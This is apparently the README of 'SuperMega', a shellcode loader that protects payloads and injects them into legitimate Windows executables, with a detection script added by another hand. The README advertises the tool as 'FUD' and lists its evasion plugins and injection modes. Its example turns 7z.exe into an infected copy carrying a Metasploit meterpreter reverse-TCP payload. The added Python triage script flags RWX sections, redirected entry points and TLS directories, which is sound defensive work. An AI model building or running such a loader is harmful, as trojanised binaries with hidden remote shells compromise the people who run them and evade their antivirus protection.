# SuperMega - Cordyceps Implementation

> Ophiocordyceps camponoti-balzani is a species of fungus that parasitizes insect hosts of the order Hymenoptera, primarily ants. O. camponoti-balzani infects ants, and eventually kills the hosts after they move to an ideal location for the fungus to spread its spores.

*(Image: Ophiocordyceps camponoti-balzani)*
## What

SuperMega is a shellcode loader. It takes shellcode as input, protects it, adds a loader, and injects the resulting shellcode into an EXE.

FUD.

And:

- Only works with 64-bit (shellcode and infectable EXEs)
Features:

- Loader source is C yay
- Execution guardrails
  - Environment variables
- Configurable implementation
- Different EXE injection techniques

Plugins:

- source style:
  - PEB_WALK
  - IAT_REUSE
- alloc style:
  - RWX
  - REUSE_RWX
- decoder style:
  - PLAIN_1
  - XOR_1
- dataref style:
  - APPEND
## Examples

### Metasploit in 7z

Inject Metasploit into 7z.exe. It will use PEB_WALK.
```
PS C:\repos\supermega> python.exe .\supermega.py --shellcode .\shellcodes\msf-meterpreter-reversetcp.bin --inject .\exes\7z.exe
(supermega.py) Super Mega
(helper.py ) --[ Remove old files ]
(model.py ) --( Capabilities:
(model.py ) 0x0: GetEnvironmentVariableW (b'')
(model.py ) 0x460090: VirtualAlloc (b'')
(supermega.py) --[ SourceStyle: peb_walk
(compiler.py ) --[ C to ASM: build\main.c -> build\main.asm ]
(compiler.py ) ---[ Make ASM from C: build\main.c ]
(compiler.py ) ---[ Fixup : build\main.asm ]
(compiler.py ) > Replace external reference at line: 8
(compiler.py ) > Replace external reference at line: 395
(compiler.py ) > Replace payload length at line: 389
(compiler.py ) > Add end of code label at line: 807
(compiler.py ) ---[ Cleanup: build\main.asm ]
(assembler.py) --[ Assemble to exe: build\main.asm -> build\main.exe -> build\main.bin ]
(assembler.py) ---[ Assemble ASM to EXE: build\main.asm -> build\main.exe ]
(assembler.py) ---[ EXE to SHC: build\main.exe -> build\main.bin ]
(helper.py ) --[ Code section: .text
(helper.py ) > 0x1000 Code Size: 2557 (raw code section size: 2560)
(assembler.py) --[ Merge stager: build\main.bin + .\shellcodes\msf-meterpreter-reversetcp.bin -> build\main.bin ]
(assembler.py) ---[ Size: Stager: 2557 and Payload: 449 Sum: 3006 ]
(injector.py ) --[ Injecting: build\main.bin into: .\exes\7z.exe -> .\exes\7z.infected.exe ]
(supermega.py) --[ Start infected exe ]
```
Injection modes (`rbmode`: first digit selects where the shellcode is stored, second digit how it gets executed):

```
rbmode
save,run
|    |
|    +---------- 1 - change AddressOfEntryPoint
|                2 - hijack branching instruction at Original Entry Point (jmp, call, ...)
|                3 - setup TLS callback
|                4 - hijack branching instruction at DLL Exported function (use -e to specify export to hook)
|
+-------------- 1 - store shellcode in the middle of a code section
                2 - append shellcode to the PE file in a new PE section
```
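From a defender's side, the modes above each leave a trace in the PE headers: an entry point that no longer sits in the first code section, an extra (often RWX) executable section appended at the end of the file, or a TLS directory that was not there before. The following triage script is an added example, not part of the SuperMega project; it uses only the Python standard library and parses the PE32+ headers by hand. The `build_pe` helper and the three sample images are constructed scaffolding so the script runs offline; the finding tags (`rwx-section`, `tls-directory`, ...) are names chosen for this example.

```python
"""Static triage of a PE32+ file for the header changes left by the loader placement
modes above: entry point redirected, executable section appended, TLS callback set.
Added example using only the standard library; not SuperMega code."""
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_FMT = "<8sIIIIIIHHI"                # IMAGE_SECTION_HEADER, 40 bytes
OPT_FMT = "<HBBIIIIIQIIHHHHHHIIIIHHQQQQII"  # IMAGE_OPTIONAL_HEADER64 up to the data directories, 112 bytes


def align(n, a):
    """Round n up to a multiple of a."""
    return -(-n // a) * a


def parse_pe(data):
    """Return (entry_rva, tls_dir_rva, sections) for a PE32+ image held in memory."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4
    nsec = struct.unpack_from("<H", data, coff + 2)[0]          # NumberOfSections
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]     # SizeOfOptionalHeader
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x20B:
        raise ValueError("only PE32+ is handled here")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]      # AddressOfEntryPoint
    tls_rva = struct.unpack_from("<I", data, opt + 112 + 9 * 8)[0]  # data directory 9 = TLS
    sections = []
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            SECTION_FMT, data, opt + opt_size + i * 40)
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize,
                         "rawptr": rawptr, "rawsize": rawsize, "chars": chars})
    return entry_rva, tls_rva, sections


def triage(data):
    """Return (tag, detail) findings; an empty list means no heuristic fired.
    These are hints for a human, not a verdict: legitimate binaries can have TLS
    callbacks or several executable sections."""
    entry_rva, tls_rva, sections = parse_pe(data)
    findings = []
    entry_sec = next((s for s in sections
                      if s["va"] <= entry_rva < s["va"] + max(s["vsize"], s["rawsize"])), None)
    code_secs = [s for s in sections if s["chars"] & IMAGE_SCN_CNT_CODE]
    if entry_sec is None:
        findings.append(("entry-outside-sections", "0x%x" % entry_rva))
    elif code_secs and entry_sec is not code_secs[0]:
        findings.append(("entry-not-in-first-code-section", entry_sec["name"]))
    for s in sections:
        if s["chars"] & IMAGE_SCN_MEM_WRITE and s["chars"] & IMAGE_SCN_MEM_EXECUTE:
            findings.append(("rwx-section", s["name"]))
        if s["chars"] & IMAGE_SCN_MEM_EXECUTE and code_secs and s is not code_secs[0]:
            findings.append(("extra-exec-section", s["name"]))
    if tls_rva:
        findings.append(("tls-directory", "0x%x" % tls_rva))
    return findings


def build_pe(sections, entry_rva, tls_rva=0):
    """Construct a minimal PE32+ file from (name, characteristics, body) tuples.
    Test scaffolding only: the result loads nothing and runs nothing."""
    file_align, sect_align = 0x200, 0x1000
    hdr_size = align(0x40 + 4 + 20 + 240 + 40 * len(sections), file_align)
    headers, bodies, va, raw = [], [], sect_align, hdr_size
    for name, chars, body in sections:
        raw_size = align(len(body), file_align)
        headers.append(struct.pack(SECTION_FMT, name.ljust(8, "\0").encode(), len(body), va,
                                   raw_size, raw, 0, 0, 0, 0, chars))
        bodies.append(body.ljust(raw_size, b"\0"))
        va += align(len(body), sect_align)
        raw += raw_size
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, 240, 0x22)
    opt = struct.pack(OPT_FMT, 0x20B, 14, 0, 0, 0, 0, entry_rva, sect_align, 0x140000000,
                      sect_align, file_align, 6, 0, 0, 0, 6, 0, 0, va, hdr_size, 0, 3, 0,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    dirs = [(0, 0)] * 16
    dirs[9] = (tls_rva, 0x28 if tls_rva else 0)                   # IMAGE_DIRECTORY_ENTRY_TLS
    opt += b"".join(struct.pack("<II", *d) for d in dirs)
    image = dos + b"PE\0\0" + coff + opt + b"".join(headers)
    return image.ljust(hdr_size, b"\0") + b"".join(bodies)


CODE_RX = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
DATA_RW = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
TEXT = (".text", CODE_RX, b"\xc3" * 64)   # constructed: 64 "ret" instructions
DATA = (".data", DATA_RW, b"\0" * 16)

# Constructed samples: an untouched layout, one with an RWX section appended and the entry
# point redirected into it (modes 2 and 1 above), and one with a TLS directory set (mode 3).
CLEAN_IMAGE = build_pe([TEXT, DATA], entry_rva=0x1000)
SUSPECT_IMAGE = build_pe([TEXT, DATA, (".supr", CODE_RX | IMAGE_SCN_MEM_WRITE, b"\x90" * 32)],
                         entry_rva=0x3000)
TLS_IMAGE = build_pe([TEXT, DATA], entry_rva=0x1000, tls_rva=0x2000)

if __name__ == "__main__":
    for label, img in (("clean", CLEAN_IMAGE), ("suspect", SUSPECT_IMAGE), ("tls", TLS_IMAGE)):
        print(label, triage(img))
```

Run against a real file, `triage(open(path, "rb").read())` gives the same list; mode 2 (hijacked branch at the original entry point) and mode 4 (hooked export) do not change these headers at all, so they need code-level comparison against a known-good copy rather than this header check.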
## Directories

- `shellcodes/`: input. Shellcodes we want to use as input (payload)
- `source/`: input. Loader C templates
- `plugins/`: input. Loader C implementations
- `exes/`: input. Non-malicious EXE files we inject into
- `build/`: build. Temporary files during the build process
- `logs/`: build. Files generated by building (inspect for debugging)
- `out/`: output. The generated result: infected exe
## Installation

### Paths

Configure `config.yaml` with:

- Path to the Visual Studio 2022 compiler and assembler
- Path to masm_shc and runshc: https://github.com/hasherezade/masm_shc

config.yaml:

```yaml
path_cl: 'C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\bin\Hostx64\x64\cl.exe'
path_ml64: 'C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\bin\Hostx64\x64\ml64.exe'
path_masmshc: 'C:\Users\hacker\Source\Repos\masm_shc\out\build\x64-Debug\masm_shc\masm_shc.exe'
path_runshc: 'C:\Users\hacker\Source\Repos\masm_shc\out\build\x64-Debug\runshc\runshc.exe'
```

Make sure it's the `Hostx64\x64` cl.exe and ml64.exe. Make sure to compile masm_shc and runshc as 64-bit. You can also replace runshc with your own shellcode loader.
### Environment Variables

Use

```
"C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxiliary\Build\vcvars64.bat"
```

or the VS developer console to find the damn environment variables, and set them in your Python console. In my case:

```powershell
$env:INCLUDE = "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\include;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\ATLMFC\include;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxiliary\VS\include;C:\Program Files (x86)\Windows Kits\10\include\10.0.22621.0\ucrt;C:\Program Files (x86)\Windows Kits\10\\include\10.0.22621.0\\um;C:\Program Files (x86)\Windows Kits\10\\include\10.0.22621.0\\shared;C:\Program Files (x86)\Windows Kits\10\\include\10.0.22621.0\\winrt;C:\Program Files (x86)\Windows Kits\10\\include\10.0.22621.0\\cppwinrt;C:\Program Files (x86)\Windows Kits\NETFXSDK\4.8\include\um"
$env:LIB="C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\ATLMFC\lib\x64;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\lib\x64;C:\Program Files (x86)\Windows Kits\NETFXSDK\4.8\lib\um\x64;C:\Program Files (x86)\Windows Kits\10\lib\10.0.22621.0\ucrt\x64;C:\Program Files (x86)\Windows Kits\10\\lib\10.0.22621.0\\um\x64"
$env:LIBPATH="C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\ATLMFC\lib\x64;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\lib\x64;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\lib\x86\store\references;C:\Program Files (x86)\Windows Kits\10\UnionMetadata\10.0.22621.0;C:\Program Files (x86)\Windows Kits\10\References\10.0.22621.0;C:\Windows\Microsoft.NET\Framework64\v4.0.30319"
```
### VS2022 Components

A list of packages/components which may be required for Visual Studio 2022:

- C++ 2022 Redistributable Update
- C++ Build Insights
- C++ CMake tools for Windows
- C++/CLI support for v143 build tools (latest)
- MSBuild
- MSVC v143 - VS 2022 C++ x64/x86 build tools (latest)
- C++ ATL for latest v143 build tools (x86 & x64)
- C++ MFC for latest v143 build tools (x86 & x64)
- Windows 11 SDK